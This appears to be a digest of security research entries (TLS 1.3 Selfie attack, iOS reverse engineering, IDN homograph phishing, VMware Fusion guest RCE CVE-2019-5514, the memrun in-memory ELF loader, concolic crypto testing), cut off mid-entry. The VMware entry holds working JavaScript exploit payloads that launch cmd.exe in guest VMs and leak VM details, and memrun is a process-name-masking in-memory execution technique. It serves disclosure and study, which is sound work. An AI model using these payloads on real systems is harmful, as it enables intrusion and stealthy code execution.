10. Selfie: reflections on TLS 1.3 with PSK

Nir Drucker and Shay Gueron
University of Haifa, Israel, and Amazon, Seattle, USA

Abstract. TLS 1.3 allows two parties to establish a shared session key from an out-of-band agreed Pre Shared Key (PSK). The PSK is used to mutually authenticate the parties, under the assumption that it is not shared with others. This allows the parties to skip the certificate verification steps, saving bandwidth, communication rounds, and latency. We identify a security vulnerability in this TLS 1.3 path, by showing a new reflection attack that we call "Selfie". The Selfie attack breaks the mutual authentication. It leverages the fact that TLS does not mandate explicit authentication of the server and the client in every message. The paper explains the root cause of this TLS 1.3 vulnerability, demonstrates the Selfie attack on the TLS implementation of OpenSSL and proposes appropriate mitigation. The attack is surprising because it breaks some assumptions and uncovers an interesting gap in the existing TLS security proofs. We explain the gap in the model assumptions and subsequently in the security proofs. We also provide an enhanced Multi-Stage Key Exchange (MSKE) model that captures the additional required assumptions of TLS 1.3 in its current state. The resulting security claims in the case of external PSKs are accordingly different.

Sursa: https://eprint.iacr.org/2019/347.pdf
11. Reverse Engineering iOS Applications

Welcome to my course Reverse Engineering iOS Applications. If you're here it means that you share my interest in application security and exploitation on iOS. Or maybe you just clicked the wrong link 😂

All the vulnerabilities that I'll show you here are real; they've been found in production applications by security researchers, including myself, as part of bug bounty programs or just regular research. One of the reasons why you don't often see writeups with these types of vulnerabilities is that most companies prohibit the publication of such content. We've helped these companies by reporting these issues to them, and we've been rewarded with bounties for that, but no one other than the researcher(s) and the company's engineering team will learn from those experiences. This is part of the reason I decided to create this course: by creating a fake iOS application that contains all the vulnerabilities I've encountered in my own research or in the very few publications from other researchers. Even though there are already some projects[^1] aimed at teaching you common issues in iOS applications, I felt like we needed one that showed the kind of vulnerabilities we've seen in applications downloaded from the App Store.

This course is divided into 5 modules that will take you from zero to reversing production applications on the Apple App Store. Every module is intended to explain a single part of the process in a series of step-by-step instructions that should guide you all the way to success.

This is my first attempt at creating an online course, so bear with me if it's not the best. I love feedback, and even if you absolutely hate it, let me know; but hopefully you'll enjoy this ride and you'll get to learn something new. Yes, I'm a n00b!

If you find typos, mistakes or plain wrong concepts please be kind and tell me so that I can fix them and we all get to learn!

Modules
Prerequisites
Introduction
Module 1 - Environment Setup
Module 2 - Decrypting iOS Applications
Module 3 - Static Analysis
Module 4 - Dynamic Analysis and Hacking
Module 5 - Binary Patching
Final Thoughts
Resources

License

Copyright 2019 Ivan Rodriguez <ios [at] ivrodriguez.com>

Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.

Disclaimer

I created this course on my own and it doesn't reflect the views of my employer; all the comments and opinions are my own.

Disclaimer of Damages

Use of this course or material is, at all times, "at your own risk."
If you are dissatisfied with any aspect of the course, any of these terms and conditions or any other policies, your only remedy is to discontinue the use of the course. In no event shall I, the course, or its suppliers, be liable to any user or third party for any damages whatsoever resulting from the use or inability to use this course or the material upon this site, whether based on warranty, contract, tort, or any other legal theory, and whether or not the website is advised of the possibility of such damages. Use any software and techniques described in this course, at all times, "at your own risk"; I'm not responsible for any losses, damages, or liabilities arising out of or related to this course. In no event will I be liable for any indirect, special, punitive, exemplary, incidental or consequential damages. This limitation will apply regardless of whether or not the other party has been advised of the possibility of such damages.

Privacy

I'm not personally collecting any information. Since this entire course is hosted on Github, that's the privacy policy you want to read.

[^1]: I love the work @prateekg147 did with DIVA and OWASP did with iGoat. They are great tools to start learning the internals of an iOS application and some of the bugs developers have introduced in the past, but I think many of the issues shown there are just theoretical or impractical and can be compared to a "self-hack". It's like looking at the source code of a webpage in a web browser: you get to understand the static code (HTML/JavaScript) of the website, but any modifications you make won't affect other users. I wanted to show vulnerabilities that can harm the company that created the application or its end users.

Sursa: https://github.com/ivRodriguezCA/RE-iOS-Apps
12. What you see is not what you get: when homographs attack

homographs, telegram, signal, security research — 01 April 2019

Introduction

Since the introduction of Unicode in domain names (known as Internationalized Domain Names, or simply IDN) by ICANN over two decades ago, a series of brand new security implications were also brought to light, together with the possibility of registering domain names using different alphabets and Unicode characters. When researching the feasibility of phishing and other attacks based on homographs and IDNs, mainly in the context of web application penetration testing, we stumbled upon a few curious cases where they also affected mobile applications. We then decided to investigate the prevalence of this class of vulnerability in mobile instant messengers, especially those that are security-oriented. This blog post offers a brief overview of homograph attacks, highlights their risks, and presents a chain of two practical exploits against Signal, Telegram and Tor Browser that could lead to nearly impossible-to-detect phishing scenarios, as well as situations where more powerful exploits could be used against an opsec-aware target.

What are homoglyphs and homographs?

It is not uncommon for characters that belong to different alphabets to look alike. These are called homoglyphs, and sometimes, depending on the font, they happen to get rendered in a visually indistinguishable way, making it impossible for a user to tell the difference between them. To the naked eye 'a' and 'а' look the same (a homoglyph), but the former belongs to the Latin script and the latter to Cyrillic. While it is hard for the untrained human eye to distinguish between them, they may be interpreted entirely differently by computers.

Homographs are two strings that seem to be the same but are in fact different. Consider, for instance, that the English word "lighter" is written the same but has a different meaning depending on the context it is used in - it can mean "a device for lighting a fire", as a noun, or the opposite of "heavier", as an adjective. The strings blazeinfosec.com and blаzeinfosec.com are oftentimes rendered as homographs, but yield different results when transformed into a URL.

Homoglyphs, and by extension homographs, exist among many different scripts. Latin, Greek and Cyrillic, for example, share numerous characters that either look exactly similar (e.g., A and А) or have a very close resemblance (e.g., P and Р). Unicode has a document that takes into consideration "confusable" characters that have look-alikes across different scripts.

Font renderization and homoglyphs

Depending on the font, the way it is rendered and also the size of the font on the display, homoglyphs and homographs may be shown either differently or completely indistinguishably from each other, as seen in CVE-2018-4277 and in the example put together by Xudong Zheng in April 2017, which highlighted the insufficient measures browsers applied against IDN homographs until then.

Below are the strings https://www.apple.com (Latin) and https://www.аррӏе.com (Cyrillic) displayed in the font Tahoma, size 30. Below are the same strings now displayed in the font Bookman Old Style, size 30. The way they are rendered and displayed, Tahoma does not seem to distinguish between the two, providing no visual indication to a user of a fraudulent website. Bookman Old Style, on the other hand, seems to at least render the 'l' and 'І' differently, giving a small visual hint about the legitimacy of the URL.
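To see that two visually identical glyphs really are different characters to a machine, it is enough to compare their code points. A minimal Python sketch (the second 'а' below is the Cyrillic one):

import unicodedata

latin_a = "a"      # U+0061
cyrillic_a = "а"   # U+0430

print(latin_a == cyrillic_a)         # False
print(unicodedata.name(latin_a))     # LATIN SMALL LETTER A
print(unicodedata.name(cyrillic_a))  # CYRILLIC SMALL LETTER A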
Internationalized Domain Names (IDN) and punycode

With the advent of support for Unicode in major operating systems and applications, and the fact that the Internet gained popularity in countries that do not necessarily use Latin as their alphabet, in the late 1990's ICANN introduced the first version of IDN. This meant that domain names could be represented in the characters of their native language, instead of being bound to ASCII characters. However, DNS systems do not understand Unicode, and a strategy to adapt to ASCII-only systems was needed. Therefore, Punycode was invented to translate domain names containing Unicode symbols into ASCII, so DNS servers could work normally. For example, https://www.blazeinfosec.com and https://www.blаzeinfosec.com in ASCII will be:

https://www.blazeinfosec.com
https://www.xn--blzeinfosec-zij.com

As the 'a' in the second URL is actually 'а' in Cyrillic, a translation into Punycode is required.

Registration of homograph domains

Initially, in Internationalized Domain Names version 1, it was possible to register a combination of ASCII and Unicode into the same domain. This clearly presented a security problem, and it is no longer true since the adoption of IDN versions 2 and 3, which further locked down the registration of Unicode domain names. Most notably, it instructed gTLDs to prevent the registration of domain names that contain mixed scripts (e.g., Latin and Kanji characters in the same string). Although many top-level domain registrars restrict mixed scripts, history has shown in practice the possibility to register similar-looking domains in a single script - which is the currently allowed practice by many gTLD registrars. Just as an example, the domains apple.com and paypal.com have Cyrillic homograph counterparts and were registered by security researchers in the past as a proof of concept of homograph issues in web browsers. Logan McDonald wrote ha-finder, a tool that takes the top 1 million websites, checks if letters in each are confusable with Latin or decimal, performs a WHOIS lookup and tells you whether the look-alike is available for registration or not.

Homograph attacks

Although ICANN was aware of the potential risks of homograph attacks since the introduction of IDN, one of the first real demonstrations of a practical IDN homograph attack is believed to have been discovered in 2005 by 3ric Johanson of Shmoo Group. The details of the issue were described in this Bugzilla ticket and affected many other browsers at the time. Another implication of Unicode homographs, though not directly related to the issue described in this blog post, was the attack documented against Spotify in their engineering blog, where a researcher discovered how to take over user accounts due to the improper conversion and canonicalization of Unicode-based usernames into their ASCII counterparts. More recently, similar phishing attacks were spotted in the wild against users of the cryptocurrency exchange MyEtherWallet and Github, and in 2018 Apple fixed a bug (CVE-2018-4277) in Safari, discovered by Tencent Labs, where the small Latin letter 'ꝱ' (dum) was rendered in the URL bar exactly like the character 'd'.

Browsers have different strategies to handle IDN. Depending on the configuration, some of them will show the Unicode in order to provide a more friendly user experience. They also have different IDN display algorithms - Google Chrome's algorithm can be found here. It performs checks on the gTLD the domain is registered on, and also verifies whether the characters are on a list of Cyrillic confusables.
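For reference, the Unicode-to-Punycode translation that these display algorithms deal with is easy to reproduce. A minimal sketch using Python's built-in IDNA codec (the 'а' in the hostname is again Cyrillic; the comment shows the expected xn-- form from the example above):

hostname = "www.blаzeinfosec.com"  # contains a Cyrillic 'а'
print(hostname.encode("idna"))     # b'www.xn--blzeinfosec-zij.com'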
Firefox, including Tor Browser with its default configuration, implements a far less strict algorithm that will simply display Unicode characters in their intended scripts, even if they are Latin confusables. These measures are certainly not enough to protect users, and it is not difficult to pull off a practical example: just click https://www.раураӏ.com to be taken to a website whose URL bar will show https://www.paypal.com but which is not at all the original PayPal. This presents a clear problem for users of Firefox and, consequently, Tor Browser. Many attempts to change these two browsers' behavior when displaying IDNs have happened in the past, including tickets for Firefox and for Tor Browser -- these tickets have been open since early 2017.

Attacking Signal, Telegram and Tor Browser with homographs

The vast majority of prior research on this topic has been centred around browsers and e-mail clients. Therefore, we decided to look into different vectors where homographs could be leveraged, whether fully or partially, for successful attacks. Oftentimes, the threat model of individuals who use privacy-oriented messenger platforms such as Signal and Telegram includes not clicking links sent via SMS or instant messengers, as this has proven to be the initial attack vector in a chain of exploits to compromise a mobile target, for instance. As mentioned earlier in this article, depending on the font and the size used to display the text, it may be rendered on the screen in a visually indistinguishable way, making it impossible for a human user to tell apart a legitimate URL from a malicious link.

Attack steps

1. Adversary acquires a homograph domain name similar to a domain suitable for the attack
2. Adversary hosts malicious content (e.g., phishing or a browser exploit) on the web server serving this URL
3. Adversary sends a link containing the malicious homograph URL to the target
4. Target clicks the link, believing it to be a legitimate URL it trusts, given there is no way to visually tell apart legitimate and malicious URLs
5. Malicious activity happens

Below we can see how Signal Android and Desktop, respectively, rendered messages with links containing homograph characters. Telegram went as far as generating a preview of the fake website, and rendered the link in a way impossible for a human to tell it is malicious.

Until recently, many browsers were vulnerable to these attacks and displayed homograph links in the URL bar in a Latin-looking fashion, as opposed to the expected Punycode. Firefox, on the other hand, by default tries to be user friendly and in many cases does not show Punycode, leaving its users vulnerable to such attacks. Tor Browser, as already mentioned, is based on Firefox, and this allows for a full attack chain against users of Signal and Telegram. Given the privacy concerns and threat model of the users of these instant messengers, it is likely many of them will be using Tor Browser for their browsing, therefore making them vulnerable to a full-chain homograph attack.

Signal + Tor Browser attack:
Telegram + Tor Browser attack:

The bugs we found in Signal and Telegram have been assigned CVE-2019-9970 and CVE-2019-10044, respectively. The advisories can be found on our Github advisories page. Other popular instant messengers, like Slack, Facebook Messenger and WhatsApp, were not vulnerable to this class of attack during our experiments. Latest versions of WhatsApp go as far as showing a label in the link to warn users it can be malicious, where other messengers simply render the link un-clickable.
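Beyond warning labels, one cheap, proactive check an application can perform before rendering a clickable link is to flag every non-ASCII code point in the host part of a URL. A minimal Python sketch (the hostname reuses the Cyrillic PayPal look-alike from above):

import unicodedata

def flag_confusables(host):
    # Report each non-ASCII character with its code point and Unicode name
    return [f"U+{ord(c):04X} {unicodedata.name(c, 'UNKNOWN')}" for c in host if ord(c) > 0x7F]

print(flag_confusables("раураӏ.com"))  # every letter before '.com' is flagged as Cyrillic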
Conclusion

Confusable homographs are a class of attacks against Internet users that has been around for nearly two decades now, since the advent of Unicode in domain names. The risks of homographs in computer security have been known and relatively well understood, yet we keep seeing homograph-related attacks resurfacing every now and then. Even though they have been around for a while, very little attention has been given to this class of attacks, as they are generally seen as not so harmful and usually fall into the category of social engineering - which is not always part of the threat models of many applications, and it is frequently assumed the user should take care of it; but we believe applications can do better. Finally, application security teams should step up their game and be proactive at preventing such attacks from happening (like Google did with Chrome), instead of pointing the blame at registrars, relying on user awareness to not bite the bait, or waiting for ICANN to come up with a magic solution to the problem.

References

[1] https://krebsonsecurity.com/2018/03/look-alike-domains-and-visual-confusion/
[2] https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/
[3] https://bugzilla.mozilla.org/show_bug.cgi?id=279099
[4] https://www.phish.ai/2018/03/13/idn-homograph-attack-back-crypto/
[5] https://dev.to/loganmeetsworld/homographs-attack--5a1p
[6] https://www.unicode.org/Public/security/latest/confusables.txt
[7] https://labs.spotify.com/2013/06/18/creative-usernames
[8] https://xlab.tencent.com/en/2018/11/13/cve-2018-4277
[9] https://urlscan.io/result/0c6b86a5-3115-43d8-9389-d6562c6c49fa
[10] https://www.xudongz.com/blog/2017/idn-phishing
[11] https://github.com/loganmeetsworld/homographs-talk/tree/master/ha-finder
[12] https://www.chromium.org/developers/design-documents/idn-in-google-chrome
[13] https://wiki.mozilla.org/IDN_Display_Algorithm
[14] https://www.ietf.org/rfc/rfc3492.txt
[15] https://trac.torproject.org/projects/tor/ticket/21961
[16] https://bugzilla.mozilla.org/show_bug.cgi?id=1332714

Sursa: https://wildfire.blazeinfosec.com/what-you-see-is-not-what-you-get-when-homographs-attack/
13. VMware Fusion 11 - Guest VM RCE - CVE-2019-5514

published 03-31-2019 00:00:00

TL;DR

You can run an arbitrary command on a VMware Fusion guest VM through a website, without any prior knowledge. Basically, VMware Fusion starts up a websocket listening only on localhost. You can fully control all the VMs (also create/delete snapshots, whatever you want) through this websocket interface, including launching apps. You need to have VMware Tools installed on the guest for launching apps, but honestly, who doesn't have it installed? So, by creating a javascript on a website, you can interact with the undocumented API, and yes, it's all unauthenticated.

Original discovery

I saw a tweet a couple of weeks ago from @CodeColorist: CodeColorist (@CodeColorist) on Twitter, talking about this issue - he was the one who discovered it, but I didn't have time to look into it for a while. When I searched for it again, that tweet had been removed. I found the same tweet on his Weibo account (~Chinese Twitter): CodeColorist Weibo. This is the screenshot he posted:

What you can see here is that you can execute arbitrary commands on a guest VM through a web socket interface, which is started by the amsrv process. I would like to give him full credit for this; what I did later is just building on top of this information.

AMSRV

I used ProcInfoExample (GitHub - objective-see/ProcInfoExample: example project, utilizing Proc Info library) to monitor what kind of processes are starting up when running VMware Fusion. When you start VMware, both vmrest (VMware REST API) and amsrv will be started:

2019-03-05 17:17:22.434 procInfoExample[10831:7776374] process start: pid: 10936 path: /Applications/VMware Fusion.app/Contents/Library/vmrest user: 501 args: ( "/Applications/VMware Fusion.app/Contents/Library/amsrv", "-D", "-p", 8698 )

2019-03-05 17:17:22.390 procInfoExample[10831:7776374] process start: pid: 10935 path: /Applications/VMware Fusion.app/Contents/Library/amsrv user: 501 args: ( "/Applications/VMware Fusion.app/Contents/Library/amsrv", "-D", "-p", 8698 )

They seem to be related, especially because you can reach some undocumented VMware REST API calls through this port. As you can control the Application Menu through the amsrv process, I think this is something like an "Application Menu Service". If we navigate to /Applications/VMware Fusion.app/Contents/Library/VMware Fusion Applications Menu.app/Contents/Resources we can find a file called app.asar, and at the end of the file there is a node.js implementation related to this websocket that listens on port 8698. It's pretty nice that you have the source code available in this file, so we don't need to do hardcore reverse engineering. If we look at the code, it reveals that the VMware Fusion Application Menu will indeed start this amsrv process on port 8698, or, if that port is busy, it will try the next available one, and so on:
const startVMRest = async () => {
  log.info('Main#startVMRest');
  if (vmrest != null) {
    log.warn('Main#vmrest is currently running.');
    return;
  }
  const execSync = require('child_process').execSync;
  let port = 8698; // The default port of vmrest is 8697
  let portFound = false;
  while (!portFound) {
    let stdout = execSync('lsof -i :' + port + ' | wc -l');
    if (parseInt(stdout) == 0) {
      portFound = true;
    } else {
      port++;
    }
  }
  // Let's store the chosen port to global
  global['port'] = port;
  const spawn = require('child_process').spawn;
  vmrest = spawn(path.join(__dirname, '../../../../../', 'amsrv'), [
    '-D',
    '-p',
    port
  ]);

We can find the related logs in the VMware Fusion Application Menu logs:

2019-02-19 09:03:05:745 Renderer#WebSocketService::connect: (url: ws://localhost:8698/ws )
2019-02-19 09:03:05:745 Renderer#WebSocketService::connect: Successfully connected (url: ws://localhost:8698/ws )
2019-02-19 09:03:05:809 Renderer#ApiService::requestVMList: (url: http://localhost:8698/api/internal/vms )

This confirms the websocket and also a REST API interface.

REST API - Leaking VM info

If we navigate to the URL above (http://localhost:8698/api/internal/vms), we will get a nicely formatted JSON with the details of our VMs:

[
  {
    "id": "XXXXXXXXXXXXXXXXXXXXXXXXXX",
    "processors": -1,
    "memory": -1,
    "path": "/Users/csaby/VM/Windows 10 x64wHVCI.vmwarevm/Windows 10 x64.vmx",
    "cachePath": "/Users/csaby/VM/Windows 10 x64wHVCI.vmwarevm/startMenu.plist",
    "powerState": "unknown"
  }
]

This is already an information leak, where an attacker can get information about our username, folders, and VM names, plus their basic information. The code below can be used to display this information. If we put this JS into any website, and a host running Fusion visits it, we can query the REST API:

var url = 'http://localhost:8698/api/internal/vms'; //A local page
var xhr = new XMLHttpRequest();
xhr.open('GET', url, true);
// If specified, responseType must be empty string or "text"
xhr.responseType = 'text';
xhr.onload = function () {
  if (xhr.readyState === xhr.DONE) {
    if (xhr.status === 200) {
      console.log(xhr.response);
      //console.log(xhr.responseText);
      document.write(xhr.response)
    }
  }
};
xhr.send(null);

If we look more closely at the code, we find these additional URLs that will leak further info:

'/api/vms/' + vm.id + '/ip' - This will give you the internal IP of the VM, but it will not work on an encrypted VM or if it's powered off.
'/api/internal/vms/' + vm.id - This is the same info you get via the first URL discussed, just limited to one VM.

Websocket - RCE with vmUUID

This is the original POC published by @CodeColorist:

<script>
ws = new WebSocket("ws://127.0.0.1:8698/ws");
ws.onopen = function() {
  const payload = {
    "name":"menu.onAction",
    "object":"11 22 33 44 55 66 77 88-99 aa bb cc dd ee ff 00",
    "userInfo": {
      "action":"launchGuestApp:",
      "vmUUID":"11 22 33 44 55 66 77 88-99 aa bb cc dd ee ff 00",
      "representedObject":"cmd.exe"
    }
  };
  ws.send(JSON.stringify(payload));
};
ws.onmessage = function(data) {
  console.log(JSON.parse(data.data));
  ws.close();
};
</script>

In this POC you need the UUID of the VM to start an application. The vmUUID is the bios.uuid that you can find in the vmx file. The 'problem' with this is that you can't leak the vmUUID, and brute forcing it would be practically impossible. You need to have VMware Tools installed on the guest for this to work, but who doesn't have it? If the VM is suspended or shut down, VMware will nicely start it for us.
Also, the command will be queued until the user logs in, so even if the screen is locked, we will be able to run the command once the user has logged in. After some experimentation I noticed that if I remove the object and vmUUID elements, the code execution still happens with the last used VM, so there is some state information saved.

Websocket - infoleak

After continuing the reversing and following the traces of what the websocket will call, and what the other options in the code are, it became clear that you have full access to the application menu, and you can fully control everything. Checking the VMware Fusion binary, it becomes clear that you have other menus with other options:

aMenuupdate:     00000001003bedd2 db "menu.update", 0        ; DATA XREF=cfstring_menu_update
aMenushow:       00000001003bedde db "menu.show", 0          ; DATA XREF=cfstring_menu_show
aMenuupdatehotk: 00000001003bede8 db "menu.updateHotKey", 0  ; DATA XREF=cfstring_menu_updateHotKey
aMenuonaction:   00000001003bedfa db "menu.onAction", 0      ; DATA XREF=cfstring_menu_onAction
aMenurefresh:    00000001003bee08 db "menu.refresh", 0       ; DATA XREF=cfstring_menu_refresh
aMenusettings:   00000001003bee15 db "menu.settings", 0      ; DATA XREF=cfstring_menu_settings
aMenuselectinde: 00000001003bee23 db "menu.selectIndex", 0   ; DATA XREF=cfstring_menu_selectIndex
aMenudidclose:   00000001003bee34 db "menu.didClose", 0      ; DATA XREF=cfstring_menu_didClose

These can all be called through the WebSocket. I didn't go ahead and discover every single option in every single menu, but you can pretty much do whatever you want (make snapshots, start VMs, delete VMs, etc…) if you know the vmUUID. This was a problem, as I hadn't figured out how to get that, and without it, it's not that useful. The next interesting option was menu.refresh. If we use the following payload:

const payload = {
  "name":"menu.refresh",
};

We will get back some details about the VMs, pinned apps, etc.:

{
  "key": "menu.update",
  "value": {
    "vmList": [
      {
        "name": "Kali 2018 Master (2018Q4)",
        "cachePath": "/Users/csaby/VM/Kali 2018 Master (2018Q4).vmwarevm/startMenu.plist"
      },
      {
        "name": "macOS 10.14",
        "cachePath": "/Users/csaby/VM/macOS 10.14.vmwarevm/startMenu.plist"
      },
      {
        "name": "Windows 10 x64",
        "cachePath": "/Users/csaby/VM/Windows 10 x64.vmwarevm/startMenu.plist"
      }
    ],
    "menu": {
      "pinnedApps": [],
      "frequentlyUsedApps": [
        {
          "rawIcons": [
            {
(...)

This is more or less what we can already see through the API discussed earlier. So, more info leak.

Websocket - full RCE (without vmUUID)

The next interesting item was menu.selectIndex; it suggested that you can select VMs, and it even had related code in the app.asar file, which told me how to call it:

// Called when VM selection changed
selectIndex(index: number) {
  log.info('Renderer#ActionService::selectIndex: (index:', index, ')');
  if (this.checkIsFusionUIRunning()) {
    this.send({
      name: 'menu.selectIndex',
      userInfo: {
        selectedIndex: index
      }
    });
  }
}

If we called this item, as suggested above, and then tried to launch an app in the guest, we could instruct which guest to run the app in. Basically, we can select a VM with this call:

const payload = {
  "name":"menu.selectIndex",
  "userInfo": {
    "selectedIndex":"3"
  }
};

The next thing I tried was whether I could use the selectedIndex directly in the menu.onAction call, and it turned out that yes, I can. It also became clear that the vmList I get with menu.refresh has the right order and indexes for each VM. In order to gain full RCE:

1. Leak the list of VMs with menu.refresh
2. Launch an application on the guest by using the index
The full POC:

<script>
ws = new WebSocket("ws://127.0.0.1:8698/ws");
ws.onopen = function() {
  //payload to show vm names and cache path
  const payload = {
    "name":"menu.refresh",
  };
  ws.send(JSON.stringify(payload));
};
ws.onmessage = function(data) {
  //document.write(data.data);
  console.log(JSON.parse(data.data));
  var j_son = JSON.parse(data.data);
  var vmlist = j_son.value.vmList;
  var i;
  for (i = 0; i < vmlist.length; i++) {
    //payload to launch an app, you can use either the vmUUID or the selectedIndex
    const payload = {
      "name":"menu.onAction",
      "userInfo": {
        "action":"launchGuestApp:",
        "selectedIndex":i,
        "representedObject":"cmd.exe"
      }
    };
    if (vmlist[i].name.includes("Win") || vmlist[i].name.includes("win")) { ws.send(JSON.stringify(payload)); }
  }
  ws.close();
};
</script>

Reporting to VMware

At this point I got in touch with @CodeColorist to ask if he had reported this to VMware, and he said that yes, they had been in touch with him. I decided to send them another report, as I found this pretty serious and I wanted to urge them, especially because, compared to the original POC, I had found a way to execute this attack without the vmUUID.

The Fix

VMware released a fix and an advisory a couple of days ago: VMSA-2019-0005. I took a look at what they did, and essentially they implemented token authentication, where the token is newly generated every time VMware starts up. This is the related code for generating a token (taken from app.asar):

String.prototype.pick = function(min, max) {
  var n, chars = '';
  if (typeof max === 'undefined') {
    n = min;
  } else {
    n = min + Math.floor(Math.random() * (max - min + 1));
  }
  for (var i = 0; i < n; i++) {
    chars += this.charAt(Math.floor(Math.random() * this.length));
  }
  return chars;
};

String.prototype.shuffle = function() {
  var array = this.split('');
  var tmp, current, top = array.length;
  if (top) while (--top) {
    current = Math.floor(Math.random() * (top + 1));
    tmp = array[current];
    array[current] = array[top];
    array[top] = tmp;
  }
  return array.join('');
};

export class Token {
  public static generate(): string {
    const specials = '!@#$%^&*()_+{}:"<>?|[];\',./`~';
    const lowercase = 'abcdefghijklmnopqrstuvwxyz';
    const uppercase = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ';
    const numbers = '0123456789';
    const all = specials + lowercase + uppercase + numbers;
    let token = '';
    token += specials.pick(1);
    token += lowercase.pick(1);
    token += uppercase.pick(1);
    token += numbers.pick(1);
    token += all.pick(5, 7);
    token = token.shuffle();
    return Buffer.from(token).toString('base64');
  }
}

The token will be a variable-length password, containing at least one character each from the specials, lowercase, uppercase and numbers sets. It will then be base64 encoded; we can see it in Wireshark when VMware uses it:

And we can also see it being used in the code:

function sendVmrestReady() {
  log.info('Main#sendVmrestReady');
  if (mainWindow) {
    mainWindow.webContents.send('vmrestReady', [
      'ws://localhost:' + global['port'] + '/ws?token=' + token,
      'http://localhost:' + global['port'],
      '?token=' + token
    ]);
  }
}

In case you have code execution on the Mac, you can probably figure this token out, but in that case it doesn't really matter anyway. The token will essentially limit the ability to exploit the vulnerability remotely. Through some experiments, I also found that you need to set the Origin header to file://, otherwise the request will be forbidden - and that is something you can't set via normal JS calls, as it will be set by the browser. Like this:

Origin: file://
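Note that the Origin check only constrains browsers - a non-browser client is free to forge the header. A minimal sketch using the third-party websocket-client Python package (the token value is elided, since it is generated per session and would have to be obtained some other way first):

# pip install websocket-client
import json
import websocket

ws = websocket.create_connection(
    "ws://127.0.0.1:8698/ws?token=...",  # token elided
    origin="file://",                    # forged Origin, impossible from a normal web page
)
ws.send(json.dumps({"name": "menu.refresh"}))
print(ws.recv())  # vmList details, as shown earlier
ws.close()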
So even if you know the token, you can't trigger this via normal webpages.

Sursa: https://theevilbit.github.io/posts/vmware_fusion_11_guest_vm_rce_cve-2019-5514/
14. memrun

Small tool written in Golang to run ELF (x86_64) binaries from memory with a given process name. Works on Linux where the kernel version is >= 3.17 (relies on the memfd_create syscall).

Usage

Build it with $ go build memrun.go and execute it. The first argument is the process name (string) you want to see in ps auxww output, for example. The second argument is the path to the ELF binary you want to run from memory.

Usage: memrun process_name elf_binary

Sursa: https://github.com/guitmz/memrun
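memrun itself is written in Go, but the underlying technique is easy to sketch. A minimal Python (3.8+, Linux-only) illustration of the same memfd_create-then-exec flow, with /bin/echo standing in for the payload:

import os

# Create an anonymous in-memory file and fill it with an ELF payload
fd = os.memfd_create("demo")
with open("/bin/echo", "rb") as elf:  # stand-in payload
    os.write(fd, elf.read())

# argv[0] becomes the process name visible in ps; exec straight from memory
os.execv(f"/proc/self/fd/{fd}", ["innocent_name", "hello from memory"])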
15. Performing Concolic Execution on Cryptographic Primitives

Post April 1, 2019 Leave a comment

Alan Cao

For my winternship and springternship at Trail of Bits, I researched novel techniques for symbolic execution on cryptographic protocols. I analyzed various implementation-level bugs in cryptographic libraries, and built a prototype Manticore-based concolic unit testing tool, Sandshrew, that analyzed C cryptographic primitives under a symbolic and concrete environment. Sandshrew is a first step for crypto developers to easily create powerful unit test cases for their implementations, backed by advancements in symbolic execution. While it can be used as a security tool to discover bugs, it also can be used as a framework for cryptographic verification.

Playing with Cryptographic Verification

When choosing and implementing crypto, our trust should lie in whether or not the implementation is formally verified. This is crucial, since crypto implementations often introduce new classes of bugs like bignum vulnerabilities, which can appear probabilistically. Therefore, by ensuring verification, we are also ensuring the functional correctness of our implementation. There are a few ways we could check our crypto for verification:

Traditional fuzzing. We can use fuzz testing tools like AFL and libFuzzer. This is not optimal for coverage, as finding deeper classes of bugs requires time. In addition, since they are random tools, they aren't exactly "formal verification", so much as a stochastic approximation thereof.

Extracting model abstractions. We can lift source code into cryptographic models that can be verified with proof languages. This requires learning purely academic tools and languages, and having a sound translation.

Just use a verified implementation! Instead of trying to prove our code, let's just use something that is already formally verified, like Project Everest's HACL* library. This strips away configurability when designing protocols and applications, as we are limited to what the library offers (e.g., HACL* doesn't implement Bitcoin's secp256k1 curve).

What about symbolic execution? Due to its ability to exhaustively explore all paths in a program, using symbolic execution to analyze cryptographic libraries can be very beneficial. It can efficiently discover bugs, guarantee coverage, and ensure verification. However, this is still an immense area of research that has yielded only a sparse number of working implementations. Why? Because cryptographic primitives often rely on properties that a symbolic execution engine may not be able to emulate. These can include the use of pseudorandom sources and platform-specific optimized assembly instructions. They contribute to complex SMT queries passed to the engine, resulting in path explosion and a significant slowdown at runtime.

One way to address this is by using concolic execution. Concolic execution mixes symbolic and concrete execution, where portions of code execution can be "concretized", or run without the presence of a symbolic executor. We harness this ability of concretization in order to maximize coverage of code paths without SMT timeouts, making this a viable strategy for approaching crypto verification.

Introducing sandshrew

After realizing the shortcomings in cryptographic symbolic execution, I decided to write a prototype concolic unit testing tool, sandshrew.
sandshrew verifies crypto by checking equivalence between a target unverified implementation and a benchmark verified implementation through small C test cases. These are then analyzed with concolic execution, using Manticore and Unicorn to execute instructions both symbolically and concretely.

Fig 1. Sample OpenSSL test case with a SANDSHREW_* wrapper over the MD5() function.

Writing Test Cases

We first write and compile a test case that tests an individual cryptographic primitive or function for equivalence against another implementation. The example shown in Figure 1 tests for a hash collision for a plaintext input, by implementing a libFuzzer-style wrapper over the MD5() function from OpenSSL. Wrappers signify to sandshrew that the primitive they wrap should be concretized during analysis.

Performing Concretization

Sandshrew leverages a symbolic environment through the robust Manticore binary API. I implemented the manticore.resolve() feature for ELF symbol resolution and used it to determine memory locations for user-written SANDSHREW_* functions from the GOT/PLT of the test case binary.

Fig 2. Using Manticore's UnicornEmulator feature in order to concretize a call instruction to the target crypto primitive.

